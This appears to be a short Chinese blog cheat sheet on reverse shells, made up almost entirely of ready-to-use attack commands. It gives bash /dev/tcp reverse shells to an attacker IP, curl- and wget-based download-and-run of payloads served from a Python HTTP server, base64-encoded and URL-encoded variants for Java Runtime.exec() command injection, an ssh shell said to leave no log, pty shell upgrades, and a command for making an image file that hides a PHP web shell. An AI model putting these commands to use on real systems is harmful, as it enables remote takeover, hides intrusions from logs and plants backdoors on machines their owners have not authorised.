title: 反弹shell
abbrlink: 2f610211
date: 2022-09-27 10:24:53
tags:

反弹shell

常用反弹shell方式如下（bash/curl/http），其他反弹shell方式参考：Click Here

bash

bash -i >& /dev/tcp/192.168.35.152/7777 0>&1

curl

攻击方：

cat bash.html
/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1

被控端：

curl 192.168.35.152/bash.html|bash

http

攻击方：

编写shell脚本并启动http服务器

echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
python2环境下：python -m SimpleHTTPServer 80
python3环境下：python -m http.server 80

被控端：

# 上传shell.sh文件
wget 192.168.35.152/shell.sh
# 执行shell.sh文件
bash shell.sh

java

java.lang.Runtime.exec() Payload：https://www.bugku.net/runtime-exec-payloads/

#  /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA==}|{base64,-d}|{bash,-i}'

URLencode bypass：

#  /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA%3D%3D}|{base64,-d}|{bash,-i}'

ssh无记录shell

ssh -T [email protected] /usr/bin/bash -i

python交互shell

python2 -c 'import pty;pty.spawn("/bin/sh")'

python3 -c "import pty;pty.spawn('/bin/bash')"

图片马制作

copy 1.jpg/b+1.php/a 2.jpg